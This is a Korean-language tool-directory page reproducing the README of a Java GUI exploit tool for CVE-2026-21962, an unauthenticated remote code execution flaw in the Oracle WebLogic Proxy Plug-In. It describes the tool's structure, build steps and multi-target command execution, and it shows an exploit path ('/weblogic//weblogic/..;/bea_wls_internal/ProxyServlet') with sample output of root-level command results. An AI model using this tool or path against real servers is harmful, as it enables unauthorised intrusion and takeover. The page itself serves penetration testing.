Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-21962_Java_GUI_Exploit_Tool — Java GUI 도구로, Oracle WebLogic Proxy Plug-In의 인증되지 않은 RCE 취약점인 CVE-2026-21962를 악용하여 HTTP를 통한 다중 대상 명령 실행을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/naozibuhao/cve-2026-21962_java_gui_exploit_tool
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubnaozibuhao/cve-2026-21962_java_gui_exploit_tool

CVE-2026-21962_Java_GUI_Exploit_Tool

Java GUI 도구로, Oracle WebLogic Proxy Plug-In의 인증되지 않은 RCE 취약점인 CVE-2026-21962를 악용하여 HTTP를 통한 다중 대상 명령 실행을 가능하게 합니다.

저장소 보기
15개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-21962 Java GUI Exploit Tool

Oracle WebLogic Server Proxy Plug-In RCE(원격 코드 실행) 취약점 악용 도구의 Java GUI 버전입니다.

프로젝트 구조

root@kitploit:~
java-version/
├── pom.xml              # Maven 프로젝트 설정 파일
├── README.md            # 프로젝트 설명 문서
├── run.bat              # Windows 실행 스크립트
└── src/
    └── main/
        └── java/
            └── com/
                └── ashwesker/
                    └── cve202621962/
                        ├── Main.java                    # 프로그램 진입점
                        ├── core/
                        │   └── Exploit.java             # 취약점 악용 핵심 로직
                        ├── gui/
                        │   └── MainWindow.java          # GUI 메인 창
                        └── util/
                            └── HttpClient.java          # HTTP 요청 도구

GUI 인터페이스 레이아웃

프로그램 창에는 다음 영역이 포함됩니다:

  1. 입력 매개변수 영역 (상단)

    • 대상 URL 텍스트 영역: 여러 줄 입력 지원, 각 줄에 대상 주소 하나
    • 실행 명령 텍스트 상자: 실행할 명령 입력
  2. 버튼 영역 (중앙)

    • 취약점 악용 실행 버튼: 취약점 악용 테스트 시작
  • 로그 지우기 버튼: 로그 및 출력 영역 지우기
  • 실행 로그 영역 (하단 왼쪽)

    • 테스트 진행 상황 및 상태 정보 실시간 표시
    • 회색 배경으로 구분 용이
  • 명령 출력 영역 (하단 오른쪽)

    • 명령 실행 결과 표시
    • 여러 대상 간 등호로 구분
    • 연한 노란색 배경으로 구분 용이
  • 기능 특징

    • GUI 인터페이스: Swing으로 구축된 그래픽 사용자 인터페이스
    • 다중 대상 지원: 여러 대상 시스템 동시 테스트 지원, 각 줄에 URL 하나
    • Maven 관리: Maven을 사용한 의존성 관리 및 빌드
    • HTTP 클라이언트: OkHttp 기반 HTTP 요청
    • 다중 경로 테스트: 여러 가능한 취약점 경로 자동 테스트
    • 실시간 로그: 실행 과정 및 결과 실시간 표시
    • 명령 출력: 명령 실행 결과 표시, 여러 대상 간 자동 구분
    • 비동기 실행: SwingWorker를 사용한 비동기 실행, 인터페이스 차단 없음

    의존성

    • OkHttp 4.12.0 (HTTP 클라이언트)
    • Java 11+

    컴파일 및 실행

    Maven으로 컴파일

    root@kitploit:~
    cd java-version
    mvn clean compile
    

    JAR로 패키징

    root@kitploit:~
    mvn clean package
    

    패키징된 JAR 파일 위치: target/cve-2026-21962-1.0.0.jar

    프로그램 실행

    방법 1: 실행 스크립트 사용 (권장)

    run.bat 파일을 더블클릭하여 프로그램을 시작합니다.

    방법 2: Maven으로 실행

    root@kitploit:~
    cd java-version
    mvn exec:java -Dexec.mainClass="com.ashwesker.cve202621962.Main"
    

    방법 3: JAR 직접 실행

    root@kitploit:~
    java -jar target/cve-2026-21962-1.0.0.jar
    

    방법 4: Java 명령으로 실행 (컴파일 필요)

    root@kitploit:~
    cd java-version
    mvn clean compile
    java -cp "target/classes;[의존성 jar 경로]" com.ashwesker.cve202621962.Main
    

    사용 예시

    예시 1: 단일 대상 테스트

    대상 URL:

    root@kitploit:~
    http://192.168.1.100:7001
    

    실행 명령:

    root@kitploit:~
    whoami
    

    예시 2: 다중 대상 일괄 테스트

    대상 URL:

    root@kitploit:~
    http://192.168.1.100:7001
    http://192.168.1.101:7001
    http://192.168.1.102:7001
    https://weblogic.example.com:4443
    

    실행 명령:

    root@kitploit:~
    id
    

    출력 결과 예시:

    root@kitploit:~
    [*] 취약점 테스트 시작...
    [*] 대상 URL: http://192.168.1.100:7001
    [*] 실행 명령: id
    [*] 테스트 경로: http://192.168.1.100:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
    [+] 성공! 상태 코드: 200
    [+] 명령 실행 성공!
    uid=0(root) gid=0(root) groups=0(root)
    ------------------------------------------------------------
    ================================================================================
    [*] 취약점 테스트 시작...
    [*] 대상 URL: http://192.168.1.101:7001
    [*] 실행 명령: id
    [*] 테스트 경로: http://192.168.1.101:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
    [+] 성공! 상태 코드: 200
    [+] 명령 실행 성공!
    uid=0(root) gid=0(root) groups=0(root)
    ------------------------------------------------------------
    

    사용 설명

    단일 대상 테스트

    1. 프로그램 시작 후 "대상 URL" 텍스트 영역에 대상 서버 주소 입력

      • 예: http://target:7001 또는 https://oracle-server:4443
    2. "실행 명령" 필드에 실행할 명령 입력

      • 예: whoami, id, powershell -c ... 등
    3. "취약점 악용 실행" 버튼 클릭하여 테스트 시작

    4. 하단의 "실행 로그"에서 테스트 과정 확인

    5. 하단의 "명령 출력"에서 명령 실행 결과 확인

    다중 대상 일괄 테스트

    1. "대상 URL" 텍스트 영역에 여러 대상 주소 입력, 각 줄에 하나씩

      root@kitploit:~
      http://target1:7001
      http://target2:7001
      https://target3:4443
      
    2. "실행 명령" 필드에 실행할 명령 입력

    3. "취약점 악용 실행" 버튼 클릭하여 일괄 테스트 시작

    4. 프로그램이 각 대상을 순차적으로 테스트하며, 서로 다른 대상의 출력 결과는 ================ (80개의 등호)로 구분

    5. 하단의 "실행 로그"에서 각 대상의 테스트 과정 확인

    6. 하단의 "명령 출력"에서 모든 대상의 명령 실행 결과 확인

    기타 작업

    • "로그 지우기" 버튼 클릭하여 로그 및 출력 영역 지우기
    • 실행 중에는 "취약점 악용 실행" 버튼이 비활성화되며, 실행 완료 후 자동으로 복구
    • 프로그램은 창 크기 조정을 지원하며, 모든 구성 요소가 창 크기에 자동으로 적응

    취약점 상세 정보

    • CVE ID: CVE-2026-21962
    • 영향 버전: Oracle HTTP Server / WebLogic Proxy Plug-In < 패치 버전 (12.2.1.4.0, 14.1.1.0.0, 14.1.2.0.0)
    • 취약점 유형: 원격 코드 실행 (RCE)
    • 인증 요구 사항: 인증 불필요

    테스트 경로

    프로그램이 자동으로 다음 경로를 테스트합니다:

    • /weblogic/
    • /wl_proxy/
    • /bea_wls_internal/
    • /_proxy/
    • /proxy/

    주의사항

    ⚠️ 경고: 이 도구는 승인된 보안 테스트에만 사용하십시오. 승인 없이 이 도구로 시스템을 공격하는 것은 불법입니다.

    • 대상 시스템을 테스트할 명확한 권한이 있는지 확인하십시오
    • 보안 연구 및 침투 테스트에만 사용하십시오
    • 현지 법률 및 규정을 준수하십시오
    • 작성자는 어떠한 오용 행위에 대해서도 책임을 지지 않습니다

    기술 구현

    • GUI 프레임워크: Java Swing
    • HTTP 클라이언트: OkHttp 4.12.0
    • 빌드 도구: Maven
    • Java 버전: Java 11+
    • 레이아웃 관리: BorderLayout, GridBagLayout, JSplitPane
    • 멀티스레딩: SwingWorker로 비동기 실행 구현
    • SSL 지원: 인증서 검증 무시, HTTPS 지원

    핵심 구성 요소 설명

    1. Main.java

      • 프로그램 진입점, 시스템 외관 설정 및 GUI 시작
    2. Exploit.java

      • 취약점 악용 핵심 로직 구현
      • Base64 인코딩 payload
      • 여러 취약점 경로 테스트
      • 콜백 인터페이스를 통한 GUI 통신
    3. MainWindow.java

      • GUI 메인 창 구현
      • 사용자 입력 및 버튼 이벤트 처리
      • 실행 로그 및 명령 출력 표시
      • 다중 대상 일괄 테스트 지원
    4. HttpClient.java

      • HTTP 요청 기능 캡슐화
      • GET/POST 요청 지원
      • SSL 인증서 검증 무시
      • 12초 타임아웃 설정

    라이선스

    이 프로젝트는 교육 및 보안 연구 목적으로만 사용됩니다.

    도구 다운로드